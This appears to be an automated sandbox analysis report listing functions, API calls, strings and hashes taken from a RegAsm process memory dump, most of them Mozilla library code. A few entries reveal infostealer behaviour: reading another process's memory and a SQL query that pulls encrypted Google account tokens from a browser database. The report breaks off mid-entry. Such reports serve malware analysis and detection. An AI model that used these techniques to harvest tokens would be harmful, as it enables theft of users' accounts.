Part of subcall function 6C0A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0A5FB2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: a57c199300e5deb6b531c84c211ebffff82bd3654fd44bf32b572e1f82e885a4
Instruction ID: acabb5e51203acd5b525a14c07463b3874ebc1433af3a4e78f2b9e033b3112be
Opcode Fuzzy Hash: a57c199300e5deb6b531c84c211ebffff82bd3654fd44bf32b572e1f82e885a4
Instruction Fuzzy Hash: 9251B1766017119BD710AB28D8807AEB3F2BF95318F97451CD81A53B01DB31F81ACFA2

Function 6C0E5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5DC9
std::_Facet_Register.LIBCPMT ref: 6C0E5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C0E5C8C,?,6C0BE829), ref: 6C0E5E45

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 3a61eb5e0ed5e9ebf0b78da15c4c0e888f32b7acec19f47b63d621cf908a64a0
Instruction ID: 69555bc8c6ffbd89f309326debbface39aa152d8bb56723cec1d532c19f16aa9
Opcode Fuzzy Hash: 3a61eb5e0ed5e9ebf0b78da15c4c0e888f32b7acec19f47b63d621cf908a64a0
Instruction Fuzzy Hash: E8417B34B442058FCF10DF65C899BAEB7F9EF89358F044468E90A9B781EB34E805CB61

Function 6C0BCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0831A7), ref: 6C0BCDDD

Strings

<jemalloc>, xrefs: 6C0BCF9F, 6C0BCFB3
: (malloc) Error in VirtualFree(), xrefs: 6C0BCFA4, 6C0BCFB8

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: b37d509e63f2c1d6d5e2635b0e740651c20c009bb83244e76ee5c804ca75ae01
Instruction ID: b3f9babf40781af6c60c192594b9c5fb50a4fcc0b5f110734abe185e029f779a
Opcode Fuzzy Hash: b37d509e63f2c1d6d5e2635b0e740651c20c009bb83244e76ee5c804ca75ae01
Instruction Fuzzy Hash: C631A2707412169BEF14EFA58C45B6E7BF5AB45B18F204059F621BBA80DFB2E5008BA1

Function 6C08BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C08BC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C08BD06

Strings

0, xrefs: 6C08BBCD
0, xrefs: 6C08BC74
y, xrefs: 6C08BC4E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 062a35001fd19428015e163d0a815ec0e58c7ea7c9a33103f0d6a12d405aba9c
Instruction ID: 92472750322df87cd00a2a52fa329db3c0617a0549aa1d9e7cc92e3bc58dd084
Opcode Fuzzy Hash: 062a35001fd19428015e163d0a815ec0e58c7ea7c9a33103f0d6a12d405aba9c
Instruction Fuzzy Hash: EE61C371A097458FCB10CF28C891B5FB7E5EF89758F048A2DF88597751DB30E9498B82

Function 6C08ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C08F100: LoadLibraryW.KERNEL32(shell32,?,6C0FD020), ref: 6C08F122
Part of subcall function 6C08F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C08F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C08ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C08EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C08EDCC
CreateFileW.KERNEL32 ref: 6C08EE08
free.MOZGLUE(00000000), ref: 6C08EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C08EE32

Part of subcall function 6C08EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C08EBB5
Part of subcall function 6C08EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C0BD7F3), ref: 6C08EBC3
Part of subcall function 6C08EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C0BD7F3), ref: 6C08EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C08EDC1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 43ff58794eb84bbe0a0bc72ae04e8bea78d6147e63be4c7b82fb8a72e4f0de4b
Instruction ID: d472bfdded07caba0f4ac403e7a4fd14d62e3ff5475569a120df8fa028fa2ce3
Opcode Fuzzy Hash: 43ff58794eb84bbe0a0bc72ae04e8bea78d6147e63be4c7b82fb8a72e4f0de4b
Instruction Fuzzy Hash: 8351BF75D063148BDF10DF68C8407AEBBF1AF59318F44C52DE8656B781EB30A988C7A2

Function 6C090A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6C0EB80C,00000000,?,?,6C09003B,?), ref: 6C090A72

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

moz_xmalloc.MOZGLUE(?,?,6C0EB80C,00000000,?,?,6C09003B,?), ref: 6C090AF5
free.MOZGLUE(00000000,?,?,6C0EB80C,00000000,?,?,6C09003B,?), ref: 6C090B9F
free.MOZGLUE(?,?,?,6C0EB80C,00000000,?,?,6C09003B,?), ref: 6C090BDB
free.MOZGLUE(00000000,?,?,6C0EB80C,00000000,?,?,6C09003B,?), ref: 6C090BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6C0EB80C,00000000,?,?,6C09003B,?), ref: 6C090C0A

Strings

alloc overflow, xrefs: 6C090C05

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 112e25fa1b6e408e657f8689b81f1bac31042c4b970ac82d9d8940bf9b3ce06d
Instruction ID: 77b28e6ccfe6bae505264d91a9c34c780b40066df7bb7647405351b634d8e272
Opcode Fuzzy Hash: 112e25fa1b6e408e657f8689b81f1bac31042c4b970ac82d9d8940bf9b3ce06d
Instruction Fuzzy Hash: 0251ADB5A08246CFDB14CF58C880BAEB3F5FF4930CF54496EC85A9BA01EB71A545CB91

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 6C0FA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0FA565

Part of subcall function 6C0FA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0FA4BE
Part of subcall function 6C0FA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C0FA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0FA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0FA6B6

Strings

0, xrefs: 6C0FA5FB
z, xrefs: 6C0FA6AE

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: f081edc7cda45f59088bd91cad4adb2d852375221ee6e026ce9589f17bfe5952
Instruction ID: 8582e2b6b98d3491d5b27ef02a9770ca457d103d0a6cfcfa630968055129c49e
Opcode Fuzzy Hash: f081edc7cda45f59088bd91cad4adb2d852375221ee6e026ce9589f17bfe5952
Instruction Fuzzy Hash: 77413D719097459FC741DF28C08068FBBE9BF89354F508A2EF89987750EB30E589CB92

Function 6C0878C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C10008B), ref: 6C087B89
free.MOZGLUE(?,6C10008B), ref: 6C087BAC

Part of subcall function 6C0878C0: free.MOZGLUE(?,6C10008B), ref: 6C087BCF

free.MOZGLUE(?,6C10008B), ref: 6C087BF2

Part of subcall function 6C0A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0A5EDB
Part of subcall function 6C0A5E90: memset.VCRUNTIME140(6C0E7765,000000E5,55CCCCCC), ref: 6C0A5F27
Part of subcall function 6C0A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0A5FB2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 3ff77a2ae6532f22439e51d81f26cd964f5a8c415c06337bf3ad24c38e029451
Instruction ID: b89fa14d30f806e2dd61f764cfcc0832803d5ed9be2f219b483356b43a2089b1
Opcode Fuzzy Hash: 3ff77a2ae6532f22439e51d81f26cd964f5a8c415c06337bf3ad24c38e029451
Instruction Fuzzy Hash: A4C19431F021288BDF248B6CCC90B9DB7F2AF41314F558299E51AA7BC5C731AE858F51

Function 6C0C9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
__Init_thread_footer.LIBCMT ref: 6C0C949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0C9459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C0C947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C0C946B

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 9b2f8b779d74d1f4cd8448ebb6aea335c5f6eeb86036b4bb2738168c86d19a83
Instruction ID: cbcfe0803bc34d52516353ccd6b8c89c4e41b1c0f9939b843f3f678822443ff5
Opcode Fuzzy Hash: 9b2f8b779d74d1f4cd8448ebb6aea335c5f6eeb86036b4bb2738168c86d19a83
Instruction Fuzzy Hash: A701B574B0010187D700DB5DD816F4E32F99B0532DF14453ADD16C6A81DF39E454995B

Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409BB2

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
lstrlenA.KERNEL32(?), ref: 00409C7E
lstrlenA.KERNEL32(?), ref: 00409C99

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

GoogleAccounts, xrefs: 00409A37
SELECT service, encrypted_token FROM token_service, xrefs: 00409B1F
AccountId, xrefs: 00409BC9
GoogleAccounts, xrefs: 00409A8E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
Instruction ID: bcd8a3c27cc20b2b0202687c0b5b9a5b34e989406908c304105e5c1fc2b99bb7
Opcode Fuzzy Hash: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
Instruction Fuzzy Hash: 45815171E40109ABCF01FFA5DE469DD77B5AF04309F511026F900B71E2DBB8AE898B99

Function 6C0D1220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0D124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0D1268
GetCurrentThreadId.KERNEL32 ref: 6C0D12DA
InitializeConditionVariable.KERNEL32(?), ref: 6C0D134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C0D138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C0D1431

Part of subcall function 6C0C8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0E1563), ref: 6C0C8BD5

free.MOZGLUE(?), ref: 6C0D145A
free.MOZGLUE(?), ref: 6C0D146C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 1c44edb527691f1ea9c8759a7716655cb5035f0cbdf4950b90df76c4db929027
Instruction ID: c15dfefe0f183e712b09f61c22467a02ba62a49f747456b60c790a7c4a506441
Opcode Fuzzy Hash: 1c44edb527691f1ea9c8759a7716655cb5035f0cbdf4950b90df76c4db929027
Instruction Fuzzy Hash: 5C61BF75A043409BDB10CF25C8807AAB7F5BFC9318F15891DE99A57712EB31F499CB82

Function 6C0D0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0D0F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0D0F88
GetCurrentThreadId.KERNEL32 ref: 6C0D0FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C0D1067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C0D10A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C0D114B

Part of subcall function 6C0C8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0E1563), ref: 6C0C8BD5

free.MOZGLUE(?), ref: 6C0D1174
free.MOZGLUE(?), ref: 6C0D1186

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 8ef9a705d859ecc5bab16000e46d47ff4b4cc8dcc1e2edb7abebde61ba7d20d0
Instruction ID: dba7b0f491a87e1578c3f717968940ed6b80c5684cbcb61919dd89d239d7aaa1
